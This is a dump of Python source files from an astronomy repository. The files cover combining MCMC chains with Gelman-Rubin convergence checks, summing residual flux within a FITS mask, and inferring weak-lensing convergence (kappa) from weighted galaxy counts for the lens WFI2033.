"python extractMillennium_Henriques.py GGL_los_8_3_0_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_3_1_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_3_2_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_3_3_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_3_4_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_3_5_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_3_6_N_4096_ang_4_Henriques2014_galaxies_on_plane\npython extractMillennium_Henriques.py GGL_los_8_3_7_N_4096_ang_4_Henriques2014_galaxies_on_plane\n" }, { "alpha_fraction": 0.590709924697876, "alphanum_fraction": 0.6067776679992676, "avg_line_length": 36.46067428588867, "blob_id": "74280fac55778acfbe47bc8a6a562cbbbda839c9", "content_id": "b61ab3489b529efd9c42ee8e900d7afd2e932b6a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3423, "license_type": "no_license", "max_line_length": 124, "num_lines": 89, "path": "/python/modeling_utilities/mcmc_combinechains.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Given a list of MCMC chains, do corner plots and assess convergence\r\n# run as python mcmc_multipleprogression.py frac file1 [file2] [...]\r\n# Above, \"frac\" is the fraction of the chain length at which burn-in ends\r\n\r\nimport sys\r\nimport numpy as np\r\nimport pylab as plt\r\nimport corner\r\n\r\nfrac = float(sys.argv[1])\r\nchains = len(sys.argv) - 2\r\nfiles = sys.argv\r\nprint \"Using %s chains...\" % chains\r\n\r\nlist = []\r\nfor i in range(chains):#10\r\n mcmc = np.loadtxt(sys.argv[2+i],unpack=True)\r\n mcmci = mcmc[1:,int(np.shape(mcmc)[1]*frac):np.shape(mcmc)[1]]\r\n # eliminate the first column, containing chi^2, and the burn-in\r\n if i == 0:\r\n mcmcfinal = mcmci\r\n minsize = np.shape(mcmci)[1]\r\n else:\r\n mcmcfinal = np.append(mcmcfinal,mcmci, axis = 1)\r\n minsize = np.min([np.shape(mcmci)[1],minsize])\r\n list += [mcmci]\r\n\r\n\r\n# Convergence diagnostics with Gelman-Rubin 1995 R_hat\r\ndef R_hat(samples): # https://groups.google.com/forum/#!topic/hddm-users/qWzCWTz-wFQ\r\n# formulae in https://pymc-devs.github.io/pymc/modelchecking.html\r\n m, n = np.shape(samples) # m = chains, n = samples\r\n # Chain variance\r\n chain_var = np.var(samples, axis=1, ddof=1) # degrees of freedom = n-ddof\r\n # Within-chain variance (mean of variances of each chain)\r\n W = 1./m * np.sum(chain_var)\r\n # Chain means\r\n chain_means = np.mean(samples, axis=1)\r\n # mean_of_means = numpy.mean(chain_means) # all chains have same length\r\n # Variance of chain means\r\n chain_means_var = np.var(chain_means, ddof=1)\r\n # Between-chain variance\r\n B = n * chain_means_var\r\n # Weighted average of within and between variance\r\n #(marginal posterior variance)\r\n Var_hat = (float(n-1)/n)*W + B/n\r\n # Potential scale reduction factor\r\n R_hat = np.sqrt(Var_hat / W)\r\n return R_hat\r\n\r\nfor i in range(np.shape(mcmci)[0]):\r\n for j in range(chains):\r\n if j == 0: samples = list[0][i][:minsize]\r\n else: samples = np.vstack((samples,list[j][i][:minsize]))\r\n print \"[%d] R_hat = \" %(i+1), R_hat(samples)\r\n\r\nfigure = corner.corner(mcmcfinal[0:np.shape(mcmcfinal)[0]].T, labels=np.linspace(1,np.shape(mcmcfinal)[0],\\\r\nnp.shape(mcmcfinal)[0]).astype(int).tolist(),quantiles=[0.16, 0.5, 0.84],show_titles=True, title_kwargs={\"fontsize\": 12})\r\n\r\n# program to find the stem of given list of words function to find the stem (longest common substring) from the string array\r\n# This code is contributed by ita_c (https://www.geeksforgeeks.org/longest-common-substring-array-strings/)\r\ndef findstem(arr):\r\n # Determine size of the array\r\n n = len(arr)\r\n # Take first word from array\r\n # as reference\r\n s = arr[0]\r\n l = len(s)\r\n res = \"\"\r\n for i in range( l) :\r\n for j in range( i + 1, l + 1) :\r\n # generating all possible substrings\r\n # of our reference string arr[0] i.e s\r\n stem = s[i:j]\r\n k = 1\r\n for k in range(1, n):\r\n # Check if the generated stem is\r\n # common to all words\r\n if stem not in arr[k]:\r\n break\r\n # If current substring is present in\r\n # all strings and its length is greater\r\n # than current result\r\n if (k + 1 == n and len(res) < len(stem)):\r\n res = stem\r\n return res\r\n\r\nstems = findstem(files[2:])\r\nfigure.savefig(\"%smcmc.png\" % stems, dpi=100)\r\n" }, { "alpha_fraction": 0.7688356041908264, "alphanum_fraction": 0.7945205569267273, "avg_line_length": 47.66666793823242, "blob_id": "fe7818d85b68716e72a6a43330b757639717e618", "content_id": "8edb7557385150ad14630b4e85150e30678e729b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 584, "license_type": "no_license", "max_line_length": 281, "num_lines": 12, "path": "/python/image_utilities/fluxinresiduals.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Given a mask marking the object footprint and a residual image, adds up the flux in the residuals\n# Run as python /Users/cerusu/GITHUB/zMstarPDF/python/image_utilities/fluxinresiduals.py /Users/cerusu/Dropbox/Glikman/analysis/msk_visit1A.fits /Users/cerusu/Dropbox/Glikman/analysis/network/125_1sers4/out_lens1pertpointextendedoriginalpsfmskarc_iter30pymc_1imagonly_subtract.fits\n\nimport numpy as np\nfrom astropy.io import fits\nimport sys\n\nmask = fits.open(str(sys.argv[1]))\nmask = mask[0].data\nresid = fits.open(str(sys.argv[2]))\nresid = resid[0].data\nprint np.sum(resid[mask==1])\n" }, { "alpha_fraction": 0.6045043468475342, "alphanum_fraction": 0.6525391340255737, "avg_line_length": 75.36122131347656, "blob_id": "ab2083cd821b0a2d8ad8c53514882e93238cf7a7", "content_id": "d6a64bfcf8cb9fccfc0aeb06c0384c3cfa6d29de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 57500, "license_type": "no_license", "max_line_length": 761, "num_lines": 753, "path": "/python/catalogue_utilities/inferkappa_unbiasedwithshearincrement2224.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Run as python inferkappa_unbiasedwithshear.py WFI2033 5 45 23 meds gal gamma oneoverr mass\n# Description of arguments: inferkappa_unbiasedwithshear.py lens radius maglim innermask sum/meds gal list_of_weight_constraints\n# weight1 should always be \"gal\", in order to use the galaxy counts when correcting the bias due to different LOS\n# the code is written such that, if shear is used as overdensity, it should be the second weight used (unless only one weight is used);\n\nimport sys\nimport os\nfrom os import system\nimport scipy as sp\nfrom scipy.stats import norm\nimport numpy as np\nimport time\n\nstart_time=time.time()\n\nlens = str(sys.argv[1])\ninnermask = str(sys.argv[2])\nradius = str(sys.argv[3])\nmag = str(sys.argv[4])\nmode = str(sys.argv[5])\nconjoined = len(sys.argv) - 6 # total number of arguments including code name, minus the number of ones that are not weights\n\nif conjoined == 1:\n weightin1 = str(sys.argv[6])\nif conjoined == 2:\n weightin1 = str(sys.argv[6])\n weightin2 = str(sys.argv[7])\nif conjoined == 3:\n weightin1 = str(sys.argv[6])\n weightin2 = str(sys.argv[7])\n weightin3 = str(sys.argv[8])\nif conjoined == 4:\n weightin1 = str(sys.argv[6])\n weightin2 = str(sys.argv[7])\n weightin3 = str(sys.argv[8])\n weightin4 = str(sys.argv[9])\n\nprint \"conjoined:\", conjoined\nroot = \"/mfst01a/rusucs/WFI2033/MSwghtratios/\"\nrootout = \"/mfst01a/rusucs/WFI2033/MSkapparesults/\"\nweightsfile = np.loadtxt(root+'weightedcounts_%s_%s_%sarcsec.lst' % (lens,mode,str(innermask)),usecols=[1,2,3,4,5,6],unpack=True) # the file where I recorded the overdensities which I measured for the real lens\nlimsigma = 2 # sigma limits on either side of the assumed gaussians\nbin_stat = 2000\nmin_kappa = -0.10\nmax_kappa = 1\n\nincrement1 = 2 # refers to the E interval from Greene et al. 2014\nincrement2 = 2\nincrement3 = 2\nincrement4 = 4\n\nif lens == \"WFI2033\":\n constr_gamma = 0.16\n constrwidth_gamma_inf = 0.14\n constrwidth_gamma_sup = 0.18\n filters = \"ugrizJHK\"\n\nif mag == \"23\" and radius == \"45\":\n measured_index = 0 # specifies the column index in weightsfile\n measured_index_inf = 1\n measured_index_sup = 2\nif mag == \"23\" and radius == \"120\":\n measured_index = 3\n measured_index_inf = 4\n measured_index_sup = 5\n\nif mag == \"23\":\n if weightin1 == \"gal\": weight1_index = 4\n if weightin1 == \"z\": weight1_index = 5\n if weightin1 == \"mass\": weight1_index = 6\n if weightin1 == \"mass2\": weight1_index = 7\n if weightin1 == \"mass3\": weight1_index = 8\n if weightin1 == \"oneoverr\": weight1_index = 9\n if weightin1 == \"zoverr\": weight1_index = 10\n if weightin1 == \"massoverr\": weight1_index = 11\n if weightin1 == \"mass2overr\": weight1_index = 12\n if weightin1 == \"mass3overr\": weight1_index = 13\n if weightin1 == \"mass2rms\": weight1_index = 14\n if weightin1 == \"mass3rms\": weight1_index = 15\n if weightin1 == \"mass2overrrms\": weight1_index = 16\n if weightin1 == \"mass3overrrms\": weight1_index = 17\n if weightin1 == \"flexion\": weight1_index = 18\n if weightin1 == \"tidal\": weight1_index = 19\n if weightin1 == \"SIS\": weight1_index = 20\n if weightin1 == \"SIShalo\": weight1_index = 21\nif conjoined >= 2:\n if mag == \"23\":\n if weightin2 == \"gal\": weight2_index = 4\n if weightin2 == \"z\": weight2_index = 5\n if weightin2 == \"mass\": weight2_index = 6\n if weightin2 == \"mass2\": weight2_index = 7\n if weightin2 == \"mass3\": weight2_index = 8\n if weightin2 == \"oneoverr\": weight2_index = 9\n if weightin2 == \"zoverr\": weight2_index = 10\n if weightin2 == \"massoverr\": weight2_index = 11\n if weightin2 == \"mass2overr\": weight2_index = 12\n if weightin2 == \"mass3overr\": weight2_index = 13\n if weightin2 == \"mass2rms\": weight2_index = 14\n if weightin2 == \"mass3rms\": weight2_index = 15\n if weightin2 == \"mass2overrrms\": weight2_index = 16\n if weightin2 == \"mass3overrrms\": weight2_index = 17\n if weightin2 == \"flexion\": weight2_index = 18\n if weightin2 == \"tidal\": weight2_index = 19\n if weightin2 == \"SIS\": weight2_index = 20\n if weightin2 == \"SIShalo\": weight2_index = 21\n if conjoined >= 3:\n if mag == \"23\":\n if weightin3 == \"gal\": weight3_index = 4\n if weightin3 == \"z\": weight3_index = 5\n if weightin3 == \"mass\": weight3_index = 6\n if weightin3 == \"mass2\": weight3_index = 7\n if weightin3 == \"mass3\": weight3_index = 8\n if weightin3 == \"oneoverr\": weight3_index = 9\n if weightin3 == \"zoverr\": weight3_index = 10\n if weightin3 == \"massoverr\": weight3_index = 11\n if weightin3 == \"mass2overr\": weight3_index = 12\n if weightin3 == \"mass3overr\": weight3_index = 13\n if weightin3 == \"mass2rms\": weight3_index = 14\n if weightin3 == \"mass3rms\": weight3_index = 15\n if weightin3 == \"mass2overrrms\": weight3_index = 16\n if weightin3 == \"mass3overrrms\": weight3_index = 17\n if weightin3 == \"flexion\": weight3_index = 18\n if weightin3 == \"tidal\": weight3_index = 19\n if weightin3 == \"SIS\": weight3_index = 20\n if weightin3 == \"SIShalo\": weight3_index = 21\n if conjoined == 4:\n if mag == \"23\":\n if weightin4 == \"gal\": weight4_index = 4\n if weightin4 == \"z\": weight4_index = 5\n if weightin4 == \"mass\": weight4_index = 6\n if weightin4 == \"mass2\": weight4_index = 7\n if weightin4 == \"mass3\": weight4_index = 8\n if weightin4 == \"oneoverr\": weight4_index = 9\n if weightin4 == \"zoverr\": weight4_index = 10\n if weightin4 == \"massoverr\": weight4_index = 11\n if weightin4 == \"mass2overr\": weight4_index = 12\n if weightin4 == \"mass3overr\": weight4_index = 13\n if weightin4 == \"mass2rms\": weight4_index = 14\n if weightin4 == \"mass3rms\": weight4_index = 15\n if weightin4 == \"mass2overrrms\": weight4_index = 16\n if weightin4 == \"mass3overrrms\": weight4_index = 17\n if weightin4 == \"flexion\": weight4_index = 18\n if weightin4 == \"tidal\": weight4_index = 19\n if weightin4 == \"SIS\": weight4_index = 20\n if weightin4 == \"SIShalo\": weight4_index = 21\n\nconstr_gal_meds = weightsfile[measured_index][0]\nconstrwidth_gal_meds_inf = weightsfile[measured_index_inf][0]\nconstrwidth_gal_meds_sup = weightsfile[measured_index_sup][0]\n\nconstr_z_meds = weightsfile[measured_index][1]\nconstrwidth_z_meds_inf = weightsfile[measured_index_inf][1]\nconstrwidth_z_meds_sup = weightsfile[measured_index_sup][1]\n\nconstr_mass_meds = weightsfile[measured_index][2]\nconstrwidth_mass_meds_inf = weightsfile[measured_index_inf][2]\nconstrwidth_mass_meds_sup = weightsfile[measured_index_sup][2]\n\nconstr_mass2_meds = weightsfile[measured_index][3]\nconstrwidth_mass2_meds_inf = weightsfile[measured_index_inf][3]\nconstrwidth_mass2_meds_sup = weightsfile[measured_index_sup][3]\n\nconstr_mass3_meds = weightsfile[measured_index][4]\nconstrwidth_mass3_meds_inf = weightsfile[measured_index_inf][4]\nconstrwidth_mass3_meds_sup = weightsfile[measured_index_sup][4]\n\nconstr_oneoverr_meds = weightsfile[measured_index][5]\nconstrwidth_oneoverr_meds_inf = weightsfile[measured_index_inf][5]\nconstrwidth_oneoverr_meds_sup = weightsfile[measured_index_sup][5]\n\nconstr_zoverr_meds = weightsfile[measured_index][6]\nconstrwidth_zoverr_meds_inf = weightsfile[measured_index_inf][6]\nconstrwidth_zoverr_meds_sup = weightsfile[measured_index_sup][6]\n\nconstr_massoverr_meds = weightsfile[measured_index][7]\nconstrwidth_massoverr_meds_inf = weightsfile[measured_index_inf][7]\nconstrwidth_massoverr_meds_sup = weightsfile[measured_index_sup][7]\n\nconstr_mass2overr_meds = weightsfile[measured_index][8]\nconstrwidth_mass2overr_meds_inf = weightsfile[measured_index_inf][8]\nconstrwidth_mass2overr_meds_sup = weightsfile[measured_index_sup][8]\n\nconstr_mass3overr_meds = weightsfile[measured_index][9]\nconstrwidth_mass3overr_meds_inf = weightsfile[measured_index_inf][9]\nconstrwidth_mass3overr_meds_sup = weightsfile[measured_index_sup][9]\n\nconstr_mass2rms_meds = weightsfile[measured_index][10]\nconstrwidth_mass2rms_meds_inf = weightsfile[measured_index_inf][10]\nconstrwidth_mass2rms_meds_sup = weightsfile[measured_index_sup][10]\n\nconstr_mass3rms_meds = weightsfile[measured_index][11]\nconstrwidth_mass3rms_meds_inf = weightsfile[measured_index_inf][11]\nconstrwidth_mass3rms_meds_sup = weightsfile[measured_index_sup][11]\n\nconstr_mass2overrrms_meds = weightsfile[measured_index][12]\nconstrwidth_mass2overrrms_meds_inf = weightsfile[measured_index_inf][12]\nconstrwidth_mass2overrrms_meds_sup = weightsfile[measured_index_sup][12]\n\nconstr_mass3overrrms_meds = weightsfile[measured_index][13]\nconstrwidth_mass3overrrms_meds_inf = weightsfile[measured_index_inf][13]\nconstrwidth_mass3overrrms_meds_sup = weightsfile[measured_index_sup][13]\n\nconstr_flexion_meds = weightsfile[measured_index][14]\nconstrwidth_flexion_meds_inf = weightsfile[measured_index_inf][14]\nconstrwidth_flexion_meds_sup = weightsfile[measured_index_sup][14]\n\nconstr_tidal_meds = weightsfile[measured_index][15]\nconstrwidth_tidal_meds_inf = weightsfile[measured_index_inf][15]\nconstrwidth_tidal_meds_sup = weightsfile[measured_index_sup][15]\n\nconstr_SIS_meds = weightsfile[measured_index][16]\nconstrwidth_SIS_meds_inf = weightsfile[measured_index_inf][16]\nconstrwidth_SIS_meds_sup = weightsfile[measured_index_sup][16]\n\nconstr_SIShalo_meds = weightsfile[measured_index][17]\nconstrwidth_SIShalo_meds_inf = weightsfile[measured_index_inf][17]\nconstrwidth_SIShalo_meds_sup = weightsfile[measured_index_sup][17]\n\nif conjoined == 4:\n if weightin4 == \"gal\": constr_weight4 = constr_gal_meds; constrwidth_weight4_inf = constrwidth_gal_meds_inf; constrwidth_weight4_sup = constrwidth_gal_meds_sup\n if weightin4 == \"z\": constr_weight4 = constr_z_meds; constrwidth_weight4_inf = constrwidth_z_meds_inf; constrwidth_weight4_sup = constrwidth_z_meds_sup\n if weightin4 == \"mass\": constr_weight4 = constr_mass_meds; constrwidth_weight4_inf = constrwidth_mass_meds_inf; constrwidth_weight4_sup = constrwidth_mass_meds_sup\n if weightin4 == \"mass2\": constr_weight4 = constr_mass2_meds; constrwidth_weight4_inf = constrwidth_mass2_meds_inf; constrwidth_weight4_sup = constrwidth_mass2_meds_sup\n if weightin4 == \"mass3\": constr_weight4 = constr_mass3_meds; constrwidth_weight4_inf = constrwidth_mass3_meds_inf; constrwidth_weight4_sup = constrwidth_mass3_meds_sup\n if weightin4 == \"oneoverr\": constr_weight4 = constr_oneoverr_meds; constrwidth_weight4_inf = constrwidth_oneoverr_meds_inf; constrwidth_weight4_sup = constrwidth_oneoverr_meds_sup\n if weightin4 == \"zoverr\": constr_weight4 = constr_zoverr_meds; constrwidth_weight4_inf = constrwidth_zoverr_meds_inf; constrwidth_weight4_sup = constrwidth_zoverr_meds_sup\n if weightin4 == \"massoverr\": constr_weight4 = constr_massoverr_meds; constrwidth_weight4_inf = constrwidth_massoverr_meds_inf; constrwidth_weight4_sup = constrwidth_massoverr_meds_sup\n if weightin4 == \"mass2overr\": constr_weight4 = constr_mass2overr_meds; constrwidth_weight4_inf = constrwidth_mass2overr_meds_inf; constrwidth_weight4_sup = constrwidth_mass2overr_meds_sup\n if weightin4 == \"mass3overr\": constr_weight4 = constr_mass3overr_meds; constrwidth_weight4_inf = constrwidth_mass3overr_meds_inf; constrwidth_weight4_sup = constrwidth_mass3overr_meds_sup\n if weightin4 == \"mass2rms\": constr_weight4 = constr_mass2rms_meds; constrwidth_weight4_inf = constrwidth_mass2rms_meds_inf; constrwidth_weight4_sup = constrwidth_mass2rms_meds_sup\n if weightin4 == \"mass3rms\": constr_weight4 = constr_mass3rms_meds; constrwidth_weight4_inf = constrwidth_mass3rms_meds_inf; constrwidth_weight4_sup = constrwidth_mass3rms_meds_sup\n if weightin4 == \"mass2overrrms\": constr_weight4 = constr_mass2overrrms_meds; constrwidth_weight4_inf = constrwidth_mass2overrrms_meds_inf; constrwidth_weight4_sup = constrwidth_mass2overrrms_meds_sup\n if weightin4 == \"mass3overrrms\": constr_weight4 = constr_mass3overrrms_meds; constrwidth_weight4_inf = constrwidth_mass3overrrms_meds_inf; constrwidth_weight4_sup = constrwidth_mass3overrrms_meds_sup\n if weightin4 == \"flexion\": constr_weight4 = constr_flexion_meds; constrwidth_weight4_inf = constrwidth_flexion_meds_inf; constrwidth_weight4_sup = constrwidth_flexion_meds_sup\n if weightin4 == \"tidal\": constr_weight4 = constr_tidal_meds; constrwidth_weight4_inf = constrwidth_tidal_meds_inf; constrwidth_weight4_sup = constrwidth_tidal_meds_sup\n if weightin4 == \"SIS\": constr_weight4 = constr_SIS_meds; constrwidth_weight4_inf = constrwidth_SIS_meds_inf; constrwidth_weight4_sup = constrwidth_SIS_meds_sup\n if weightin4 == \"SIShalo\": constr_weight4 = constr_SIShalo_meds; constrwidth_weight4_inf = constrwidth_SIShalo_meds_inf; constrwidth_weight4_sup = constrwidth_SIShalo_meds_sup\n if weightin4 == \"gamma\": constr_weight4 = constr_gamma; constrwidth_weight4_inf = constrwidth_gamma_inf; constrwidth_weight4_sup = constrwidth_gamma_sup\n\nif (conjoined == 3) | (conjoined == 4):\n if weightin3 == \"gal\": constr_weight3 = constr_gal_meds; constrwidth_weight3_inf = constrwidth_gal_meds_inf; constrwidth_weight3_sup = constrwidth_gal_meds_sup\n if weightin3 == \"z\": constr_weight3 = constr_z_meds; constrwidth_weight3_inf = constrwidth_z_meds_inf; constrwidth_weight3_sup = constrwidth_z_meds_sup\n if weightin3 == \"mass\": constr_weight3 = constr_mass_meds; constrwidth_weight3_inf = constrwidth_mass_meds_inf; constrwidth_weight3_sup = constrwidth_mass_meds_sup\n if weightin3 == \"mass2\": constr_weight3 = constr_mass2_meds; constrwidth_weight3_inf = constrwidth_mass2_meds_inf; constrwidth_weight3_sup = constrwidth_mass2_meds_sup\n if weightin3 == \"mass3\": constr_weight3 = constr_mass3_meds; constrwidth_weight3_inf = constrwidth_mass3_meds_inf; constrwidth_weight3_sup = constrwidth_mass3_meds_sup\n if weightin3 == \"oneoverr\": constr_weight3 = constr_oneoverr_meds; constrwidth_weight3_inf = constrwidth_oneoverr_meds_inf; constrwidth_weight3_sup = constrwidth_oneoverr_meds_sup\n if weightin3 == \"zoverr\": constr_weight3 = constr_zoverr_meds; constrwidth_weight3_inf = constrwidth_zoverr_meds_inf; constrwidth_weight3_sup = constrwidth_zoverr_meds_sup\n if weightin3 == \"massoverr\": constr_weight3 = constr_massoverr_meds; constrwidth_weight3_inf = constrwidth_massoverr_meds_inf; constrwidth_weight3_sup = constrwidth_massoverr_meds_sup\n if weightin3 == \"mass2overr\": constr_weight3 = constr_mass2overr_meds; constrwidth_weight3_inf = constrwidth_mass2overr_meds_inf; constrwidth_weight3_sup = constrwidth_mass2overr_meds_sup\n if weightin3 == \"mass3overr\": constr_weight3 = constr_mass3overr_meds; constrwidth_weight3_inf = constrwidth_mass3overr_meds_inf; constrwidth_weight3_sup = constrwidth_mass3overr_meds_sup\n if weightin3 == \"mass2rms\": constr_weight3 = constr_mass2rms_meds; constrwidth_weight3_inf = constrwidth_mass2rms_meds_inf; constrwidth_weight3_sup = constrwidth_mass2rms_meds_sup\n if weightin3 == \"mass3rms\": constr_weight3 = constr_mass3rms_meds; constrwidth_weight3_inf = constrwidth_mass3rms_meds_inf; constrwidth_weight3_sup = constrwidth_mass3rms_meds_sup\n if weightin3 == \"mass2overrrms\": constr_weight3 = constr_mass2overrrms_meds; constrwidth_weight3_inf = constrwidth_mass2overrrms_meds_inf; constrwidth_weight3_sup = constrwidth_mass2overrrms_meds_sup\n if weightin3 == \"mass3overrrms\": constr_weight3 = constr_mass3overrrms_meds; constrwidth_weight3_inf = constrwidth_mass3overrrms_meds_inf; constrwidth_weight3_sup = constrwidth_mass3overrrms_meds_sup\n if weightin3 == \"flexion\": constr_weight3 = constr_flexion_meds; constrwidth_weight3_inf = constrwidth_flexion_meds_inf; constrwidth_weight3_sup = constrwidth_flexion_meds_sup\n if weightin3 == \"tidal\": constr_weight3 = constr_tidal_meds; constrwidth_weight3_inf = constrwidth_tidal_meds_inf; constrwidth_weight3_sup = constrwidth_tidal_meds_sup\n if weightin3 == \"SIS\": constr_weight3 = constr_SIS_meds; constrwidth_weight3_inf = constrwidth_SIS_meds_inf; constrwidth_weight3_sup = constrwidth_SIS_meds_sup\n if weightin3 == \"SIShalo\": constr_weight3 = constr_SIShalo_meds; constrwidth_weight3_inf = constrwidth_SIShalo_meds_inf; constrwidth_weight3_sup = constrwidth_SIShalo_meds_sup\n if weightin3 == \"gamma\": constr_weight3 = constr_gamma; constrwidth_weight3_inf = constrwidth_gamma_inf; constrwidth_weight3_sup = constrwidth_gamma_sup\n\nif (conjoined == 2) | (conjoined == 3) | (conjoined == 4):\n if weightin2 == \"gal\": constr_weight2 = constr_gal_meds; constrwidth_weight2_inf = constrwidth_gal_meds_inf; constrwidth_weight2_sup = constrwidth_gal_meds_sup\n if weightin2 == \"z\": constr_weight2 = constr_z_meds; constrwidth_weight2_inf = constrwidth_z_meds_inf; constrwidth_weight2_sup = constrwidth_z_meds_sup\n if weightin2 == \"mass\": constr_weight2 = constr_mass_meds; constrwidth_weight2_inf = constrwidth_mass_meds_inf; constrwidth_weight2_sup = constrwidth_mass_meds_sup\n if weightin2 == \"mass2\": constr_weight2 = constr_mass2_meds; constrwidth_weight2_inf = constrwidth_mass2_meds_inf; constrwidth_weight2_sup = constrwidth_mass2_meds_sup\n if weightin2 == \"mass3\": constr_weight2 = constr_mass3_meds; constrwidth_weight2_inf = constrwidth_mass3_meds_inf; constrwidth_weight2_sup = constrwidth_mass3_meds_sup\n if weightin2 == \"oneoverr\": constr_weight2 = constr_oneoverr_meds; constrwidth_weight2_inf = constrwidth_oneoverr_meds_inf; constrwidth_weight2_sup = constrwidth_oneoverr_meds_sup\n if weightin2 == \"zoverr\": constr_weight2 = constr_zoverr_meds; constrwidth_weight2_inf = constrwidth_zoverr_meds_inf; constrwidth_weight2_sup = constrwidth_zoverr_meds_sup\n if weightin2 == \"massoverr\": constr_weight2 = constr_massoverr_meds; constrwidth_weight2_inf = constrwidth_massoverr_meds_inf; constrwidth_weight2_sup = constrwidth_massoverr_meds_sup\n if weightin2 == \"mass2overr\": constr_weight2 = constr_mass2overr_meds; constrwidth_weight2_inf = constrwidth_mass2overr_meds_inf; constrwidth_weight2_sup = constrwidth_mass2overr_meds_sup\n if weightin2 == \"mass3overr\": constr_weight2 = constr_mass3overr_meds; constrwidth_weight2_inf = constrwidth_mass3overr_meds_inf; constrwidth_weight2_sup = constrwidth_mass3overr_meds_sup\n if weightin2 == \"mass2rms\": constr_weight2 = constr_mass2rms_meds; constrwidth_weight2_inf = constrwidth_mass2rms_meds_inf; constrwidth_weight2_sup = constrwidth_mass2rms_meds_sup\n if weightin2 == \"mass3rms\": constr_weight2 = constr_mass3rms_meds; constrwidth_weight2_inf = constrwidth_mass3rms_meds_inf; constrwidth_weight2_sup = constrwidth_mass3rms_meds_sup\n if weightin2 == \"mass2overrrms\": constr_weight2 = constr_mass2overrrms_meds; constrwidth_weight2_inf = constrwidth_mass2overrrms_meds_inf; constrwidth_weight2_sup = constrwidth_mass2overrrms_meds_sup\n if weightin2 == \"mass3overrrms\": constr_weight2 = constr_mass3overrrms_meds; constrwidth_weight2_inf = constrwidth_mass3overrrms_meds_inf; constrwidth_weight2_sup = constrwidth_mass3overrrms_meds_sup\n if weightin2 == \"flexion\": constr_weight2 = constr_flexion_meds; constrwidth_weight2_inf = constrwidth_flexion_meds_inf; constrwidth_weight2_sup = constrwidth_flexion_meds_sup\n if weightin2 == \"tidal\": constr_weight2 = constr_tidal_meds; constrwidth_weight2_inf = constrwidth_tidal_meds_inf; constrwidth_weight2_sup = constrwidth_tidal_meds_sup\n if weightin2 == \"SIS\": constr_weight2 = constr_SIS_meds; constrwidth_weight2_inf = constrwidth_SIS_meds_inf; constrwidth_weight2_sup = constrwidth_SIS_meds_sup\n if weightin2 == \"SIShalo\": constr_weight2 = constr_SIShalo_meds; constrwidth_weight2_inf = constrwidth_SIShalo_meds_inf; constrwidth_weight2_sup = constrwidth_SIShalo_meds_sup\n if weightin2 == \"gamma\": constr_weight2 = constr_gamma; constrwidth_weight2_inf = constrwidth_gamma_inf; constrwidth_weight2_sup = constrwidth_gamma_sup\n\nif (conjoined == 1) | (conjoined == 2) | (conjoined == 3) | (conjoined == 4):\n if weightin1 == \"gal\": constr_weight1 = constr_gal_meds; constrwidth_weight1_inf = constrwidth_gal_meds_inf; constrwidth_weight1_sup = constrwidth_gal_meds_sup\n if weightin1 == \"z\": constr_weight1 = constr_z_meds; constrwidth_weight1_inf = constrwidth_z_meds_inf; constrwidth_weight1_sup = constrwidth_z_meds_sup\n if weightin1 == \"mass\": constr_weight1 = constr_mass_meds; constrwidth_weight1_inf = constrwidth_mass_meds_inf; constrwidth_weight1_sup = constrwidth_mass_meds_sup\n if weightin1 == \"mass2\": constr_weight1 = constr_mass2_meds; constrwidth_weight1_inf = constrwidth_mass2_meds_inf; constrwidth_weight1_sup = constrwidth_mass2_meds_sup\n if weightin1 == \"mass3\": constr_weight1 = constr_mass3_meds; constrwidth_weight1_inf = constrwidth_mass3_meds_inf; constrwidth_weight1_sup = constrwidth_mass3_meds_sup\n if weightin1 == \"oneoverr\": constr_weight1 = constr_oneoverr_meds; constrwidth_weight1_inf = constrwidth_oneoverr_meds_inf; constrwidth_weight1_sup = constrwidth_oneoverr_meds_sup\n if weightin1 == \"zoverr\": constr_weight1 = constr_zoverr_meds; constrwidth_weight1_inf = constrwidth_zoverr_meds_inf; constrwidth_weight1_sup = constrwidth_zoverr_meds_sup\n if weightin1 == \"massoverr\": constr_weight1 = constr_massoverr_meds; constrwidth_weight1_inf = constrwidth_massoverr_meds_inf; constrwidth_weight1_sup = constrwidth_massoverr_meds_sup\n if weightin1 == \"mass2overr\": constr_weight1 = constr_mass2overr_meds; constrwidth_weight1_inf = constrwidth_mass2overr_meds_inf; constrwidth_weight1_sup = constrwidth_mass2overr_meds_sup\n if weightin1 == \"mass3overr\": constr_weight1 = constr_mass3overr_meds; constrwidth_weight1_inf = constrwidth_mass3overr_meds_inf; constrwidth_weight1_sup = constrwidth_mass3overr_meds_sup\n if weightin1 == \"mass2rms\": constr_weight1 = constr_mass2rms_meds; constrwidth_weight1_inf = constrwidth_mass2rms_meds_inf; constrwidth_weight1_sup = constrwidth_mass2rms_meds_sup\n if weightin1 == \"mass3rms\": constr_weight1 = constr_mass3rms_meds; constrwidth_weight1_inf = constrwidth_mass3rms_meds_inf; constrwidth_weight1_sup = constrwidth_mass3rms_meds_sup\n if weightin1 == \"mass2overrrms\": constr_weight1 = constr_mass2overrrms_meds; constrwidth_weight1_inf = constrwidth_mass2overrrms_meds_inf; constrwidth_weight1_sup = constrwidth_mass2overrrms_meds_sup\n if weightin1 == \"mass3overrrms\": constr_weight1 = constr_mass3overrrms_meds; constrwidth_weight1_inf = constrwidth_mass3overrrms_meds_inf; constrwidth_weight1_sup = constrwidth_mass3overrrms_meds_sup\n if weightin1 == \"flexion\": constr_weight1 = constr_flexion_meds; constrwidth_weight1_inf = constrwidth_flexion_meds_inf; constrwidth_weight1_sup = constrwidth_flexion_meds_sup\n if weightin1 == \"tidal\": constr_weight1 = constr_tidal_meds; 